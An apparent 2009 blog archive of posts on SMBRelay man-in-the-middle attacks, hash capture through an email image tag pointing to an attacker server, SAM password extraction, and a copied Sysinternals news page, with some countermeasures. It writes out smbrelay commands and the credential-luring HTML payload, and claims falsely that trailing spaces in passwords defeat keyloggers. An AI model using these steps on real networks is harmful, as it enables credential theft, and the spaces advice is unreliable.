Client and server communication will cause it to cryptographically sign each block of SMB communications.
These settings are found under Security Policies /Security Options

There are inherent weaknesses in executing a SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges as this is a port number less than 1024.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious email

Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.

Another countermeasure is as discussed earlier in the context of SMBRelay MITM - to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection

While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.

NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

---Regards,
Amarjit Singh

SMBRelay man-in-the-middle Scenario

The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, an d a target server address of 192.168.234.34 with /T.

c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34
When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashe s the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.

Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:

c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168

A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

---Regards,
Amarjit Singh

SMB Hacking Tools - SMB Relay

SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic.
It can also perform man-in-the-middle (MITM) attacks.
You must disable NetBIOS over TCP/IP and block ports 139 and 445.
Start the SMBRelay server and listen for SMB packets:
```
c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2 
```
An attacker can access the client machine by simply connecting to it via relay address using: c: \> net use * \\\c$

SMBRelay by Sir Dystic of the Cult of Dead Cow is essentially a SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.

SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

The usage is smbrelay [options]

Options:

/D num - Set debug level, current valid levels: 0 (none), 1, 2 Defaults to 0.
/E - Enumerates interfaces and their indexes.
/F[-] - Fake server only, capture password hashes and do not relay Use - to disable acting as a fake server if relay fails.
/IL num - Set the interface index to use when adding local IP addresses.
/IR num - Set the interface index to use when adding relay IP addresses Defaults to 1.
/L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC Defaults to primary host IP.
/R[-] IP - Set the starting relay IP address to use. Use [-] to not add each relay IP address to the NIC Defaults to 192.1.1.1 first.
/S name - Set the source machine name.

The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The servers can then capture both LM and NTLM passwords, and write them to its working directory as hashes.txt which can be later imported into LOphtCrack. Furthermore, the attacker's system now can access the client machine by simply connecting to it via the relay address: c: \>net use * \\192.x.x.x\c$

On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

---Regards,
Amarjit Singh

Redirecting SMB Logon to the Attacker

Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.
Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.
When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be directly off the network using tools such as Lophtcrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the Lophtcrack cracking engine.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

Countermeasures include:

Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;
Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;
Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

---Regards,
Amarjit Singh

Monday, April 20, 2009

Cracking NT/2000 passwords

SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located at %systemroot%\system32\config directory [open this link using RUN]
The file is locked when the OS is running.
- Booting to an alternate OS
  - NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive.
- Backup SAM from the Repair directory
  - Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._sam
- Extract the hashes from the SAM
  - Use LOphtcrack to hash the passwords.

This file is usually locked when the system is in use. However, once the system is not used by any system components, it is world readable by default. Attackers are particularly vigilant to detect any possible SAM.SAV files which could be readable, as these can be used for obtaining password info.

There are tools such as NTFSDOS that are capable of mounting any NTFS partition as a logical drive. NTFSDOS.EXE is a read-only network file system driver for DOS/Windows that is able to recognize and mount NTFS drives for transparent access. It makes NTFS drives appear indistinguishable from standard FAT drives, providing the ability to navigate, view and execute programs on them from DOS or from Windows.

Not all is lost if the system is in use and the SAM file is locked. If a system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck because during the installation of NT/2000 a copy of the password database is put in \\WINNT\REPAIR.

What happens if the system administrator has updated their repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities for dumping the password hashes out, like pwdump or even run Lophtcrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

---Regards,
Amarjit Singh

The Windows Sysinternals

The Sysinternals web site was created in 1996 by Mark Russinovich and Bryce Cogswell to host their advanced system utilities and technical information. Microsoft acquired Sysinternals in July, 2006. Whether you’re an IT Pro or a developer, you’ll find Sysinternals utilities to help you manage, troubleshoot and diagnose your Windows systems and applications. If you have a question about a tool or how to use them, please visit the Sysinternals Forum for answers and help from other users and our moderators.

Sysinternals Live

Sysinternals Live is a service that enables you to execute Sysinternals tools directly from the Web without hunting for and manually downloading them. Simply enter a tool’s Sysinternals Live path into Windows Explorer or a command prompt as http://live.sysinternals.com/ or \\live.sysinternals.com\tools\.

You can view the entire Sysinternals Live tools directory in a browser at http://live.sysinternals.com.

What's New (April 8, 2009)

Sysinternals wishes Channel 9 a Happy Birthday!

Channel 9, Microsoft's direct connection to developers, turned five a few days ago. Mark frequently gives interviews on Channel 9, including his latest on Windows 7 kernel changes, which is Channel 9's most viewed interview of all time at 550,000 views. Mark was one of the Niners to give Channel 9 a special birthday wish.

What's New (March 30, 2009)

Mark’s Blog: Pushing the Limits of Windows: Paged and Nonpaged Pool

Check out Mark’s latest entry in his Pushing the Limits of Windows series, where he describes the role of the kernel’s paged and nonpaged pool resources, their limits, how the system behaves when they run out, and how to track down a driver that’s leaking pool.

Autoruns v9.40

This Autoruns update shows manual start Windows services, fixes a bug that affected the display of autostart locations that could include multiple startup registrations, and fixes a bug in the Jump To functionality on 64-bit Windows.

What's New (March 17, 2009)

Process Monitor v2.04

This update shows file mapping operations in basic mode, adds more translations of error numbers to text, fixes a bug that limited support for more boot log files larger than 4GB, and displays version numbers using the same formatting as Windows.

TCPView v2.54

Version 2.54 fixes bugs that prevented the display of IPv6 TCP endpoints and the correct display of IPv6 UDP endpoints

VMMap v1.02

VMMap now shows all image subsections, even if they reside within the same allocation region. It also fixes a bug in image name sorting and makes the UAC elevation smoother on 64-bit Windows.

What's New (March 2, 2009)

Sigcheck v1.6

This update adds checking for .NET strong signatures and extends the output of the -i option, which shows the image signers, to also print the path of the catalog that stores a file's signature.

What's New (February 23, 2009)

Vmmap v1.0

Vmmap is a new utility for analyzing process address spaces and working sets. Aimed primarily at developers, its detailed graphical and textual breakdown of exactly what types of memory contribute to a process's memory footprint make it a powerful performance analysis and tuning tool.

Mark to Speak at TechEd 2009

Come see the 2009 version of Mark's popular "Case of the Unexplained" session, where he demonstrates the use of Sysinternals tools with real-world troubleshooting examples. Mark's Windows 7 and Windows Server 2008 R2 session expands on his Channel 9 interview to dive deep on system-level enhancements and improvements, and his Inside Windows Server 2008 R2 Virtualization and VHD Enhancements session takes you on a tour of new features like Live Migration, Second Level Address Translation, and native VHD support.

What's New (February 4, 2009)

Mark’s Blog: The Case of the Phantom Desktop Files

Follow Mark’s latest investigation as he walks you through how he solved a problem ticket submitted by his wife for a perplexing issue she ran into on the kitchen computer.

Windows 7: To the Beta and Beyond

Join Mark Russinovich and a panel of MVPs and industry IT pros for a live discussion about Windows 7, its features and how it’s shaping up to be the best Windows yet.

What's New (January 12, 2009)

ZoomIt 3.0

This major update to ZoomIt, the Sysinternals screen magnification and annotation utility, adds a LiveZoom mode on Windows Vista and higher, allows you to change the typing and break timer font, adds the ability to copy the magnified screen to the clipboard with Ctrl+C, and introduces a new configuration interface.

What's New (January 6, 2009)

Mark's Blog: The Case of the Crashed Phone Call

Check out Mark's latest blog post to see how David Solomon, Mark's coauthor for the Windows Internals books, resolved a blue screen problem most likely related to an outdated driver.

---Regards,
Amarjit Singh

Password Types

Passwords can be categorized into various types based on their composition. Let us take a look at these types to enhance our understanding of password cracking.

Passwords that contain only letters: As rightly inferred, these contain just alphabets and are the easiest to crack. Example: "secret"
Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"
Passwords that contain only special characters: These passwords consist of only special characters. They are easy to crack in accordance with their decreasing length. Example: "*%$%@"
Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Examples: "a3rf5"
Passwords that contain only letters and special characters and passwords that contain only special characters and numbers are quite similar to the preceding one. Examples: "df%g$i", "39*&4"
Passwords that contain letters, special characters and numbers are considered to be the most secure as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and if encrypted well, safe on the network as well. Example: "a#d5y8%"

************************************************************************

NOTE: Well friends, this is nowhere documented that, the most secure password contains [SPACES]. Using spaces in your password, it will become the strongest. Using spaces, you can easily bypass trojans & keylogers(almost 100%). I recommend to use 3-4 spaces as prefix of your password. For e.g. suppose you password is : "iamsweet123" without quote

Instead of this password, use "iamsweet123 ". Now what is the difference. Have a closer look. In the later one you will see that its excetely "iamsweet123[space][space][space]"

************************************************************************

---Regards,
Amarjit Singh

Receive Daily Updates

Thursday, April 30, 2009

Monday, April 27, 2009

Saturday, April 25, 2009

Friday, April 24, 2009

Thursday, April 23, 2009

Wednesday, April 22, 2009

Tuesday, April 21, 2009

Monday, April 20, 2009